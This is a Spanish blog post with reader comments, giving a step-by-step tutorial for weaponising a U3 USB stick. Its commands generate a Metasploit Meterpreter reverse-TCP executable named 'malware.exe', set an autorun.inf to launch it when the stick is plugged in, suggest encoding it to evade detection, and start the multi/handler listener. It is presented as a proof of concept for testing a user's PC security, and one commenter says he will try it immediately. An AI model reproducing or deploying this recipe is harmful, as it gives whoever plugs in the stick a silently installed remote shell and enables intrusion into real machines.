En 4 simples pasos vamos a armar un USB U3, para que al ser conectado a una PC, realice una conexión reversa con meterpreter.
La idea es generar con MetaSploit un ejecutable con un payload que genere una conexión reversa al conectar el USB a la PC. Para grabar el payload dentro del U3, vamos a utilizar el programa Universal Customizer.
La idea es generar con MetaSploit un ejecutable con un payload que genere una conexión reversa al conectar el USB a la PC. Para grabar el payload dentro del U3, vamos a utilizar el programa Universal Customizer.
1. Generamos el Payload con MetaSploit
En este caso vamos a crear un ejecutable con una conexión reversa de meterpreter:
./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe
Por supuesto que podemos utilizar cualquier otro payload, como también encodearlo para que sea más difícil su detección.
2. Creamos nuestra ISO
Una vez que bajamos y descomprimimos Universal Customizer, copiamos malware.exe al directorio "U3CUSTOM" y creamos el archivo "autorun.inf" con el siguiente contenido:
[AutoRun] open=malware.exe
Luego ejecutamos "ISOCreate.cmd" y dentro del directorio "BIN" se va a crear nuestra ISO con el nombre "U3CUSTOM.ISO". Si no creamos nuestra ISO, Universal Customizer va a utilizar la "U3CUSTOM.ISO" que ya viene dentro del paquete, con una versión de Hacksaw.
3. Grabamos la ISO
Luego corremos Universal Customizer y vamos siguiendo los pasos:
Al finalizar, quitamos el USB y cuando lo volvamos a conectar ya tendrá nuestro payload adentro.
4. Escuchamos por la Conexión Reversa
Para finalizar, debemos dejar un listener escuchando por la conexión reversa del payload que grabamos en el U3:
./msfconsole use exploit/multi/handler set PAYLAOD windows/meterpreter/reverse_tcp set LHOST 1.1.1.1 set LPORT 443 set ExitOnSession false exploit -j
Eso es todo, una interesante prueba de concepto para probar la seguridad de la PC de un usuario.
LINKS RELACIONADOS:
- Ataques USB con tecnología U3 por Rafael Montero
- USB Keys & Metasploit for fun and profit
- Sallis Usb Hacks
- Universal Customizer
Publicado por Leonardo Pigñer en www.KUNGFOOSION.com
2 comentarios:
Lo hare ahora mismo, seeeee, saludos de su amigo moften
A mi se me queda en Please insert a U3 smart driver and run U3 Custonizer again, como tengo que preparar el pen driver para que lo detecte?
Muchas gracias.
Publicar un comentario